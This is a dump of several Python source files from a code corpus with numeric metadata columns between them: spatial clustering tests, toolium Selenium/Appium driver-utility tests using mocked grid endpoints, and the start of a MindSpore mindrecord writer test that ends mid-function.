cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_dict(neighbors_dict, value_dict, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# tests with Graph
# ... with dicts as attr and spatially_extensive_attr
def test_graph_dict_basic():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_networkx(graph, attr_dict, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# ... with strings as attr and spatially_extensive_attr
def test_graph_str_basic():
nx.set_node_attributes(graph, attr_str, attr_dict)
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_networkx(graph, attr_str, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# test with W
def test_w_basic():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_w(w, attr, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# ### TESTS WITH NON-SCALAR attr AND spatially_extensive_attr #################
# test with csr_matrix
def test_scipy_sparse_matrix_multi_attr():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_scipy_sparse_matrix(adj, double_attr, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with a GeoDataFrame
def test_geodataframe_multi_attr():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_geodataframe(gdf, double_attr_str, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with a dict as areas argument
def test_dict_multi_attr():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_dict(neighbors_dict, double_attr_dict, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with Graph
# ... with dicts as attr and spatially_extensive_attr
def test_graph_dict_multi_attr():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_networkx(graph, double_attr_dict, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# ... with strings as attr and spatially_extensive_attr
def test_graph_str_multi_attr():
nx.set_node_attributes(graph, attr_str, attr_dict)
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_networkx(graph, double_attr_str, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# test with W
def test_w_multi_attr():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_w(w, double_attr, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
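# Editor's note: the scalar-attr and multi-attr variants above repeat one
# fit/compare body per input type. A sketch of the same coverage via
# parametrization (editorial suggestion, not part of the original module):
import pytest

@pytest.mark.parametrize("attr_arg", [attr, double_attr])
def test_scipy_sparse_matrix_parametrized(attr_arg):
    cluster_object = AZPBasicTabu(random_state=0)
    cluster_object.fit_from_scipy_sparse_matrix(adj, attr_arg, n_regions=2)
    obtained = region_list_from_array(cluster_object.labels_)
    compare_region_lists(obtained, optimal_clustering)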
| 38.684211
| 79
| 0.781179
| 613
| 4,410
| 5.187602
| 0.106036
| 0.14717
| 0.057233
| 0.077673
| 0.876415
| 0.857862
| 0.849371
| 0.849371
| 0.849371
| 0.849371
| 0
| 0.006276
| 0.13288
| 4,410
| 113
| 80
| 39.026549
| 0.825314
| 0.121315
| 0
| 0.535211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.169014
| false
| 0
| 0.070423
| 0
| 0.239437
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6
| 4c6b4a0f8b5a7b1a3b8b284ec01c67e6c9482254
| 80
| py
| Python
| ltplugins/__init__.py
| mezantrop/ltplugins
| 6ecac71f67b3463e219756d78ccdf76108da0909
| ["BSD-2-Clause"]
| null | null | null
| ltplugins/__init__.py
| mezantrop/ltplugins
| 6ecac71f67b3463e219756d78ccdf76108da0909
| ["BSD-2-Clause"]
| null | null | null
| ltplugins/__init__.py
| mezantrop/ltplugins
| 6ecac71f67b3463e219756d78ccdf76108da0909
| ["BSD-2-Clause"]
| null | null | null |
from ltplugins.ltplugins import LTPlugins
from ltplugins.__about__ import about
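# Editor's note: re-exporting in __init__.py flattens the public import path,
# so callers can write (assuming the names imported above exist in the
# submodules):
#
#     from ltplugins import LTPlugins, about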
| 26.666667
| 41
| 0.875
| 10
| 80
| 6.6
| 0.4
| 0.393939
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 80
| 2
| 42
| 40
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 6
| 4c77ce748bd1e5a1078132bf828e64555b94ccb7
| 26,218
| py
| Python
| toolium/test/utils/test_driver_utils.py
| tanistra/toolium
| d7f06c7ab9f264c42fe55eed4f9a3065512d910e
| ["Apache-2.0"]
| null | null | null
| toolium/test/utils/test_driver_utils.py
| tanistra/toolium
| d7f06c7ab9f264c42fe55eed4f9a3065512d910e
| ["Apache-2.0"]
| null | null | null
| toolium/test/utils/test_driver_utils.py
| tanistra/toolium
| d7f06c7ab9f264c42fe55eed4f9a3065512d910e
| ["Apache-2.0"]
| null | null | null |
# -*- coding: utf-8 -*-
u"""
Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U.
This file is part of Toolium.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import time
import mock
import pytest
import requests_mock
from requests.exceptions import ConnectionError
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.remote.webelement import WebElement
from toolium.config_files import ConfigFiles
from toolium.driver_wrapper import DriverWrapper
from toolium.driver_wrappers_pool import DriverWrappersPool
from toolium.pageelements.page_element import PageElement
from toolium.utils.driver_utils import Utils
navigation_bar_tests = (
('android', 'C:/Demo.apk', None, 0),
('android', None, 'chrome', 0),
('ios', '/tmp/Demo.zip', None, 0),
('ios', None, 'safari', 64),
('firefox', None, None, 0),
)
driver_name_tests = (
('firefox', 'firefox'),
('chrome', 'chrome'),
('iexplore-11', 'iexplore'),
('iexplore-11-on-WIN10', 'iexplore'),
)
def get_mock_element(x, y, height, width):
"""Create a mock element with custom location and size
:param x: x location
:param y: y location
:param height: element height
:param width: element width
:returns: mock element
"""
mock_element = mock.MagicMock(spec=WebElement)
mock_element.location = {'x': x, 'y': y}
mock_element.size = {'height': height, 'width': width}
return mock_element
@pytest.yield_fixture
def driver_wrapper():
# Reset wrappers pool values
DriverWrappersPool._empty_pool()
DriverWrapper.config_properties_filenames = None
# Create a new wrapper
driver_wrapper = DriverWrappersPool.get_default_wrapper()
driver_wrapper.driver = mock.MagicMock()
# Configure properties
root_path = os.path.dirname(os.path.realpath(__file__))
config_files = ConfigFiles()
config_files.set_config_directory(os.path.join(root_path, 'conf'))
config_files.set_config_properties_filenames('properties.cfg')
config_files.set_output_directory(os.path.join(root_path, 'output'))
driver_wrapper.configure(config_files)
yield driver_wrapper
# Reset wrappers pool values
DriverWrappersPool._empty_pool()
DriverWrapper.config_properties_filenames = None
@pytest.fixture
def utils():
# Create a new Utils instance
return Utils()
@pytest.mark.parametrize("driver_type, driver_name", driver_name_tests)
def test_get_driver_name(driver_type, driver_name, driver_wrapper, utils):
driver_wrapper.config.set('Driver', 'type', driver_type)
assert utils.get_driver_name() == driver_name
def test_get_available_log_types_one_log_type(driver_wrapper, utils):
# Configure mock
log_types_mock = mock.PropertyMock(return_value=['client', 'server'])
type(driver_wrapper.driver).log_types = log_types_mock
driver_wrapper.config.set('Server', 'log_types', 'client')
log_types = utils.get_available_log_types()
log_types_mock.assert_not_called()
assert log_types == ['client']
def test_get_available_log_types_multiple_log_types(driver_wrapper, utils):
# Configure mock
log_types_mock = mock.PropertyMock(return_value=['client', 'server'])
type(driver_wrapper.driver).log_types = log_types_mock
driver_wrapper.config.set('Server', 'log_types', 'client,server,browser')
log_types = utils.get_available_log_types()
log_types_mock.assert_not_called()
assert log_types == ['client', 'server', 'browser']
def test_get_available_log_types_multiple_log_types_with_spaces(driver_wrapper, utils):
# Configure mock
log_types_mock = mock.PropertyMock(return_value=['client', 'server'])
type(driver_wrapper.driver).log_types = log_types_mock
driver_wrapper.config.set('Server', 'log_types', 'client, server , browser')
log_types = utils.get_available_log_types()
log_types_mock.assert_not_called()
assert log_types == ['client', 'server', 'browser']
def test_get_available_log_types_none_log_type(driver_wrapper, utils):
# Configure mock
log_types_mock = mock.PropertyMock(return_value=['client', 'server'])
type(driver_wrapper.driver).log_types = log_types_mock
driver_wrapper.config.set('Server', 'log_types', '')
log_types = utils.get_available_log_types()
log_types_mock.assert_not_called()
assert log_types == []
def test_get_available_log_types_all_log_type(driver_wrapper, utils):
# Configure mock
log_types_mock = mock.PropertyMock(return_value=['client', 'server'])
type(driver_wrapper.driver).log_types = log_types_mock
driver_wrapper.config.set('Server', 'log_types', 'all')
log_types = utils.get_available_log_types()
log_types_mock.assert_called_once_with()
assert log_types == ['client', 'server']
def test_get_available_log_types_without_log_types(driver_wrapper, utils):
# Configure mock
log_types_mock = mock.PropertyMock(return_value=['client', 'server'])
type(driver_wrapper.driver).log_types = log_types_mock
log_types = utils.get_available_log_types()
log_types_mock.assert_called_once_with()
assert log_types == ['client', 'server']
def test_save_webdriver_logs_all_log_type(utils):
# Configure mock
Utils.save_webdriver_logs_by_type = mock.MagicMock()
Utils.get_available_log_types = mock.MagicMock(return_value=['client', 'server'])
utils.save_webdriver_logs('test_name')
Utils.save_webdriver_logs_by_type.assert_has_calls([mock.call('client', 'test_name'),
mock.call('server', 'test_name')])
def test_save_webdriver_logs_without_log_types(utils):
# Configure mock
Utils.save_webdriver_logs_by_type = mock.MagicMock()
Utils.get_available_log_types = mock.MagicMock(return_value=[])
utils.save_webdriver_logs('test_name')
Utils.save_webdriver_logs_by_type.assert_not_called()
def test_get_remote_node(driver_wrapper, utils):
# Configure mock
driver_wrapper.driver.session_id = '5af'
url = 'http://{}:{}/grid/api/testsession?session={}'.format('localhost', 4444, '5af')
grid_response_json = {'session': 'e2', 'proxyId': 'http://10.20.30.40:5555', 'msg': 'slot found !',
'inactivityTime': 78, 'success': True, 'internalKey': '7a'}
with requests_mock.mock() as req_mock:
req_mock.get(url, json=grid_response_json)
# Get remote node and check result
assert utils.get_remote_node() == ('grid', '10.20.30.40')
assert url == req_mock.request_history[0].url
def test_get_remote_node_selenium3(driver_wrapper, utils):
# Configure mock
driver_wrapper.driver.session_id = '5af'
url = 'http://{}:{}/grid/api/testsession?session={}'.format('localhost', 4444, '5af')
grid_response_json = {'session': 'e2', 'proxyId': '10.20.30.40', 'msg': 'slot found !',
'inactivityTime': 78, 'success': True, 'internalKey': '7a'}
with requests_mock.mock() as req_mock:
req_mock.get(url, json=grid_response_json)
# Get remote node and check result
assert utils.get_remote_node() == ('grid', '10.20.30.40')
assert url == req_mock.request_history[0].url
def test_get_remote_node_ggr(driver_wrapper, utils):
# Configure mock
driver_wrapper.driver.session_id = '5af'
grid_url = 'http://{}:{}/grid/api/testsession?session={}'.format('localhost', 4444, '5af')
ggr_url = 'http://{}:{}/host/{}'.format('localhost', 4444, '5af')
ggr_response_json = {'Count': 3, 'Username': '', 'Scheme': '', 'VNC': '', 'Name': 'host_name', 'Password': '',
'Port': 4500}
with requests_mock.mock() as req_mock:
req_mock.get(grid_url, text='non_json_response')
req_mock.get(ggr_url, json=ggr_response_json)
# Get remote node and check result
assert utils.get_remote_node() == ('ggr', 'host_name')
assert grid_url == req_mock.request_history[0].url
assert ggr_url == req_mock.request_history[1].url
def test_get_remote_node_selenoid(driver_wrapper, utils):
# Configure mock
driver_wrapper.driver.session_id = '5af'
grid_url = 'http://{}:{}/grid/api/testsession?session={}'.format('localhost', 4444, '5af')
ggr_url = 'http://{}:{}/host/{}'.format('localhost', 4444, '5af')
selenoid_url = 'http://{}:{}/status'.format('localhost', 4444)
selenoid_response_json = {'total': 5, 'used': 0, 'queued': 0, 'pending': 0, 'browsers': {'firefox': {'59.0': {}}}}
with requests_mock.mock() as req_mock:
req_mock.get(grid_url, text='non_json_response')
req_mock.get(ggr_url, json={})
req_mock.get(selenoid_url, json=selenoid_response_json)
# Get remote node and check result
assert utils.get_remote_node() == ('selenoid', 'localhost')
assert grid_url == req_mock.request_history[0].url
assert ggr_url == req_mock.request_history[1].url
assert selenoid_url == req_mock.request_history[2].url
def test_get_remote_node_non_grid(driver_wrapper, utils):
# Configure mock
driver_wrapper.driver.session_id = '5af'
grid_url = 'http://{}:{}/grid/api/testsession?session={}'.format('localhost', 4444, '5af')
ggr_url = 'http://{}:{}/host/{}'.format('localhost', 4444, '5af')
selenoid_url = 'http://{}:{}/status'.format('localhost', 4444)
with requests_mock.mock() as req_mock:
req_mock.get(grid_url, text='non_json_response')
req_mock.get(ggr_url, json={})
req_mock.get(selenoid_url, json={})
# Get remote node and check result
assert utils.get_remote_node() == ('selenium', 'localhost')
assert grid_url == req_mock.request_history[0].url
assert ggr_url == req_mock.request_history[1].url
assert selenoid_url == req_mock.request_history[2].url
def test_get_remote_node_local_execution(driver_wrapper, utils):
driver_wrapper.config.set('Server', 'enabled', 'false')
assert utils.get_remote_node() == ('local', None)
def test_get_remote_video_url(utils):
# Configure mock
url = 'http://{}:{}/video'.format('10.20.30.40', 3000)
video_url = 'http://{}:{}/download_video/f4.mp4'.format('10.20.30.40', 3000)
video_response_json = {'exit_code': 1, 'out': [],
'error': ['Cannot call this endpoint without required parameters: session and action'],
'available_videos': {'5af': {'size': 489701,
'session': '5af',
'last_modified': 1460041262558,
'download_url': video_url,
'absolute_path': 'C:\\f4.mp4'}},
'current_videos': []}
with requests_mock.mock() as req_mock:
req_mock.get(url, json=video_response_json)
# Get remote video url and check result
assert utils._get_remote_video_url('10.20.30.40', '5af') == video_url
assert url == req_mock.request_history[0].url
def test_get_remote_video_url_no_videos(utils):
# Configure mock
url = 'http://{}:{}/video'.format('10.20.30.40', 3000)
video_response_json = {'exit_code': 1, 'out': [],
'error': ['Cannot call this endpoint without required parameters: session and action'],
'available_videos': {},
'current_videos': []}
with requests_mock.mock() as req_mock:
req_mock.get(url, json=video_response_json)
# Get remote video url and check result
assert utils._get_remote_video_url('10.20.30.40', '5af') is None
assert url == req_mock.request_history[0].url
def test_is_remote_video_enabled(utils):
# Configure mock
url = 'http://{}:{}/config'.format('10.20.30.40', 3000)
config_response_json = {'out': [], 'error': [], 'exit_code': 0,
'filename': ['selenium_grid_extras_config.json'],
'config_runtime': {'theConfigMap': {
'video_recording_options': {'width': '1024', 'videos_to_keep': '5',
'frames': '30',
'record_test_videos': 'true'}}}}
with requests_mock.mock() as req_mock:
req_mock.get(url, json=config_response_json)
# Get remote video configuration and check result
assert utils.is_remote_video_enabled('10.20.30.40') is True
assert url == req_mock.request_history[0].url
def test_is_remote_video_enabled_disabled(utils):
# Configure mock
url = 'http://{}:{}/config'.format('10.20.30.40', 3000)
config_response_json = {'out': [], 'error': [], 'exit_code': 0,
'filename': ['selenium_grid_extras_config.json'],
'config_runtime': {'theConfigMap': {
'video_recording_options': {'width': '1024', 'videos_to_keep': '5',
'frames': '30',
'record_test_videos': 'false'}}}}
with requests_mock.mock() as req_mock:
req_mock.get(url, json=config_response_json)
# Get remote video configuration and check result
assert utils.is_remote_video_enabled('10.20.30.40') is False
assert url == req_mock.request_history[0].url
@mock.patch('toolium.utils.driver_utils.requests.get')
def test_is_remote_video_enabled_non_grid_extras(req_get_mock, utils):
# Configure mock
req_get_mock.side_effect = ConnectionError('exception error')
# Get remote video configuration and check result
assert utils.is_remote_video_enabled('10.20.30.40') is False
@pytest.mark.parametrize("driver_type, appium_app, appium_browser_name, bar_height", navigation_bar_tests)
def test_get_safari_navigation_bar_height(driver_type, appium_app, appium_browser_name, bar_height, driver_wrapper,
utils):
driver_wrapper.config.set('Driver', 'type', driver_type)
if appium_app:
driver_wrapper.config.set('AppiumCapabilities', 'app', appium_app)
if appium_browser_name:
driver_wrapper.config.set('AppiumCapabilities', 'browserName', appium_browser_name)
assert utils.get_safari_navigation_bar_height() == bar_height
def test_get_window_size_android_native(driver_wrapper, utils):
# Configure driver mock
window_size = {'width': 375, 'height': 667}
driver_wrapper.driver.get_window_size.return_value = window_size
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'app', 'C:/Demo.apk')
assert utils.get_window_size() == window_size
driver_wrapper.driver.get_window_size.assert_called_once_with()
def test_get_window_size_android_native_two_times(driver_wrapper, utils):
# Configure driver mock
window_size = {'width': 375, 'height': 667}
driver_wrapper.driver.get_window_size.return_value = window_size
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'app', 'C:/Demo.apk')
assert utils.get_window_size() == window_size
assert utils.get_window_size() == window_size
# Check that the window size is calculated only once
driver_wrapper.driver.get_window_size.assert_called_once_with()
def test_get_window_size_android_web(driver_wrapper, utils):
# Configure driver mock
window_size = {'width': 375, 'height': 667}
driver_wrapper.driver.current_context = 'WEBVIEW'
driver_wrapper.driver.execute_script.side_effect = [window_size['width'], window_size['height']]
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'browserName', 'chrome')
assert utils.get_window_size() == window_size
driver_wrapper.driver.execute_script.assert_has_calls(
[mock.call('return window.innerWidth'), mock.call('return window.innerHeight')])
def test_get_window_size_android_web_two_times(driver_wrapper, utils):
# Configure driver mock
window_size = {'width': 375, 'height': 667}
driver_wrapper.driver.current_context = 'WEBVIEW'
driver_wrapper.driver.execute_script.side_effect = [window_size['width'], window_size['height']]
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'browserName', 'chrome')
assert utils.get_window_size() == window_size
assert utils.get_window_size() == window_size
# Check that the window size is calculated only once
driver_wrapper.driver.execute_script.assert_has_calls(
[mock.call('return window.innerWidth'), mock.call('return window.innerHeight')])
def test_get_native_coords_android_web(driver_wrapper, utils):
# Configure driver mock
web_window_size = {'width': 500, 'height': 667}
native_window_size = {'width': 250, 'height': 450}
driver_wrapper.driver.current_context = 'WEBVIEW'
driver_wrapper.driver.execute_script.side_effect = [web_window_size['width'], web_window_size['height']]
driver_wrapper.driver.get_window_size.side_effect = [native_window_size]
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'browserName', 'chrome')
web_coords = {'x': 105, 'y': 185}
native_coords = {'x': 52.5, 'y': 92.5}
assert utils.get_native_coords(web_coords) == native_coords
def test_get_native_coords_ios_web(driver_wrapper, utils):
# Configure driver mock
web_window_size = {'width': 500, 'height': 667}
native_window_size = {'width': 250, 'height': 450}
driver_wrapper.driver.get_window_size.side_effect = [web_window_size, native_window_size]
driver_wrapper.config.set('Driver', 'type', 'ios')
driver_wrapper.config.set('AppiumCapabilities', 'browserName', 'safari')
web_coords = {'x': 105, 'y': 185}
native_coords = {'x': 52.5, 'y': 156.5}
assert utils.get_native_coords(web_coords) == native_coords
def test_swipe_android_native(driver_wrapper, utils):
# Configure driver mock
web_window_size = {'width': 500, 'height': 667}
native_window_size = {'width': 250, 'height': 450}
driver_wrapper.driver.get_window_size.side_effect = [web_window_size, native_window_size]
driver_wrapper.driver.current_context = 'NATIVE_APP'
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'app', 'C:/Demo.apk')
# Create element mock
element = get_mock_element(x=250, y=40, height=40, width=300)
utils.swipe(element, 50, 100)
driver_wrapper.driver.swipe.assert_called_once_with(400, 60, 450, 160, None)
def test_swipe_android_web(driver_wrapper, utils):
# Configure driver mock
web_window_size = {'width': 500, 'height': 667}
native_window_size = {'width': 250, 'height': 450}
driver_wrapper.driver.current_context = 'WEBVIEW'
driver_wrapper.driver.execute_script.side_effect = [web_window_size['width'], web_window_size['height']]
driver_wrapper.driver.get_window_size.side_effect = [native_window_size]
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'browserName', 'chrome')
# Create element mock
element = get_mock_element(x=250, y=40, height=40, width=300)
utils.swipe(element, 50, 100)
driver_wrapper.driver.swipe.assert_called_once_with(200, 30, 250, 130, None)
def test_swipe_android_hybrid(driver_wrapper, utils):
# Configure driver mock
web_window_size = {'width': 500, 'height': 667}
native_window_size = {'width': 250, 'height': 450}
# driver_wrapper.utils
driver_wrapper.driver.get_window_size.side_effect = [web_window_size, native_window_size]
driver_wrapper.driver.current_context = 'WEBVIEW'
driver_wrapper.config.set('Driver', 'type', 'android')
driver_wrapper.config.set('AppiumCapabilities', 'app', 'C:/Demo.apk')
# Create element mock
element = get_mock_element(x=250, y=40, height=40, width=300)
utils.swipe(element, 50, 100)
driver_wrapper.driver.swipe.assert_called_once_with(200, 30, 250, 130, None)
def test_swipe_ios_web(driver_wrapper, utils):
# Configure driver mock
web_window_size = {'width': 500, 'height': 667}
native_window_size = {'width': 250, 'height': 450}
driver_wrapper.driver.get_window_size.side_effect = [web_window_size, native_window_size]
driver_wrapper.config.set('Driver', 'type', 'ios')
driver_wrapper.config.set('AppiumCapabilities', 'browserName', 'safari')
# Create element mock
element = get_mock_element(x=250, y=40, height=40, width=300)
utils.swipe(element, 50, 100)
driver_wrapper.driver.swipe.assert_called_once_with(200, 94, 50, 100, None)
def test_swipe_web(driver_wrapper, utils):
# Configure driver mock
driver_wrapper.config.set('Driver', 'type', 'firefox')
# Create element mock
element = get_mock_element(x=250, y=40, height=40, width=300)
with pytest.raises(Exception) as excinfo:
utils.swipe(element, 50, 100)
assert 'Swipe method is not implemented in Selenium' == str(excinfo.value)
def test_get_web_element_from_web_element(utils):
element = WebElement(None, 1)
web_element = utils.get_web_element(element)
assert element == web_element
def test_get_web_element_from_page_element(driver_wrapper, utils):
# Mock Driver.save_web_element = True
driver_wrapper.config = mock.MagicMock()
driver_wrapper.config.getboolean_optional.return_value = True
element = PageElement(By.ID, 'element_id')
element._web_element = 'mock_element'
web_element = utils.get_web_element(element)
assert 'mock_element' == web_element
def test_get_web_element_from_locator(driver_wrapper, utils):
# Configure driver mock
driver_wrapper.driver.find_element.return_value = 'mock_element'
element_locator = (By.ID, 'element_id')
# Get element and assert response
web_element = utils.get_web_element(element_locator)
assert 'mock_element' == web_element
driver_wrapper.driver.find_element.assert_called_once_with(*element_locator)
def test_get_web_element_from_none(utils):
web_element = utils.get_web_element(None)
assert web_element is None
def test_get_web_element_from_unknown(utils):
web_element = utils.get_web_element(dict())
assert web_element is None
def test_wait_until_first_element_is_found_locator(driver_wrapper, utils):
# Configure driver mock
driver_wrapper.driver.find_element.return_value = 'mock_element'
element_locator = (By.ID, 'element_id')
element = utils.wait_until_first_element_is_found([element_locator])
assert element_locator == element
driver_wrapper.driver.find_element.assert_called_once_with(*element_locator)
def test_wait_until_first_element_is_found_page_element(driver_wrapper, utils):
# Mock Driver.save_web_element = True
driver_wrapper.config = mock.MagicMock()
driver_wrapper.config.getboolean_optional.return_value = True
page_element = PageElement(By.ID, 'element_id')
page_element._web_element = 'mock_element'
element = utils.wait_until_first_element_is_found([page_element])
assert page_element == element
def test_wait_until_first_element_is_found_none(driver_wrapper, utils):
# Mock Driver.save_web_element = True
driver_wrapper.config = mock.MagicMock()
driver_wrapper.config.getboolean_optional.return_value = True
page_element = PageElement(By.ID, 'element_id')
page_element._web_element = 'mock_element'
element = utils.wait_until_first_element_is_found([None, page_element])
assert page_element == element
def test_wait_until_first_element_is_found_timeout(driver_wrapper, utils):
# Configure driver mock
driver_wrapper.driver.find_element.side_effect = NoSuchElementException('Unknown')
element_locator = (By.ID, 'element_id')
start_time = time.time()
with pytest.raises(TimeoutException) as excinfo:
utils.wait_until_first_element_is_found([element_locator])
end_time = time.time()
assert 'None of the page elements has been found after 10 seconds' in str(excinfo.value)
# find_element has been called more than once
driver_wrapper.driver.find_element.assert_called_with(*element_locator)
# Execution time must be greater than timeout
assert end_time - start_time > 10
def test_wait_until_first_element_is_found_custom_timeout(driver_wrapper, utils):
# Configure driver mock
driver_wrapper.driver.find_element.side_effect = NoSuchElementException('Unknown')
element_locator = (By.ID, 'element_id')
start_time = time.time()
with pytest.raises(TimeoutException) as excinfo:
utils.wait_until_first_element_is_found([element_locator], timeout=15)
end_time = time.time()
assert 'None of the page elements has been found after 15 seconds' in str(excinfo.value)
# find_element has been called more than once
driver_wrapper.driver.find_element.assert_called_with(*element_locator)
# Execution time must be greater than timeout
assert end_time - start_time > 15
def test_utils_compatibility():
# Check that utils works with old import
from toolium.utils import Utils
old_import_utils = Utils()
assert hasattr(old_import_utils, 'get_web_element')
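# Editor's note: the remote-node tests above all share one requests_mock
# shape. A self-contained sketch of that pattern (URL and payload are
# illustrative only):
def _requests_mock_sketch():
    import requests
    with requests_mock.mock() as req_mock:
        req_mock.get('http://localhost:4444/status', json={'ok': True})
        # The mocked transport answers the GET and records it in history.
        assert requests.get('http://localhost:4444/status').json() == {'ok': True}
        assert req_mock.request_history[0].url == 'http://localhost:4444/status'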
| 40.397535
| 118
| 0.700854
| 3,426
| 26,218
| 5.051956
| 0.102452
| 0.090883
| 0.050497
| 0.039404
| 0.819968
| 0.797492
| 0.770049
| 0.755662
| 0.736249
| 0.720649
| 0
| 0.02512
| 0.180067
| 26,218
| 648
| 119
| 40.459877
| 0.780016
| 0.095698
| 0
| 0.58794
| 0
| 0
| 0.155088
| 0.007202
| 0
| 0
| 0
| 0
| 0.188442
| 1
| 0.115578
| false
| 0.002513
| 0.042714
| 0.002513
| 0.163317
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6
| 4c7a8e7078f044d03a01433ca5ff3c24b469be98
| 11,495
| py
| Python
| tests/ut/python/dataset/test_minddataset_exception.py
| Rossil2012/mindspore
| 8a20b5d784b3fec6d32e058581ec56ec553a06a0
| ["Apache-2.0"]
| 1
| 2021-04-23T06:35:18.000Z
| 2021-04-23T06:35:18.000Z
| tests/ut/python/dataset/test_minddataset_exception.py
| nudt-eddie/mindspore
| 55372b41fdfae6d2b88d7078971e06d537f6c558
| ["Apache-2.0"]
| null | null | null
| tests/ut/python/dataset/test_minddataset_exception.py
| nudt-eddie/mindspore
| 55372b41fdfae6d2b88d7078971e06d537f6c558
| ["Apache-2.0"]
| null | null | null |
#!/usr/bin/env python
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import pytest
import mindspore.dataset as ds
from mindspore.mindrecord import FileWriter
CV_FILE_NAME = "./imagenet.mindrecord"
CV1_FILE_NAME = "./imagenet1.mindrecord"
def create_cv_mindrecord(files_num):
"""tutorial for cv dataset writer."""
if os.path.exists(CV_FILE_NAME):
os.remove(CV_FILE_NAME)
if os.path.exists("{}.db".format(CV_FILE_NAME)):
os.remove("{}.db".format(CV_FILE_NAME))
writer = FileWriter(CV_FILE_NAME, files_num)
cv_schema_json = {"file_name": {"type": "string"}, "label": {"type": "int32"}, "data": {"type": "bytes"}}
data = [{"file_name": "001.jpg", "label": 43, "data": bytes('0xffsafdafda', encoding='utf-8')}]
writer.add_schema(cv_schema_json, "img_schema")
writer.add_index(["file_name", "label"])
writer.write_raw_data(data)
writer.commit()
def create_diff_schema_cv_mindrecord(files_num):
"""tutorial for cv dataset writer."""
if os.path.exists(CV1_FILE_NAME):
os.remove(CV1_FILE_NAME)
if os.path.exists("{}.db".format(CV1_FILE_NAME)):
os.remove("{}.db".format(CV1_FILE_NAME))
writer = FileWriter(CV1_FILE_NAME, files_num)
cv_schema_json = {"file_name_1": {"type": "string"}, "label": {"type": "int32"}, "data": {"type": "bytes"}}
data = [{"file_name_1": "001.jpg", "label": 43, "data": bytes('0xffsafdafda', encoding='utf-8')}]
writer.add_schema(cv_schema_json, "img_schema")
writer.add_index(["file_name_1", "label"])
writer.write_raw_data(data)
writer.commit()
def create_diff_page_size_cv_mindrecord(files_num):
"""tutorial for cv dataset writer."""
if os.path.exists(CV1_FILE_NAME):
os.remove(CV1_FILE_NAME)
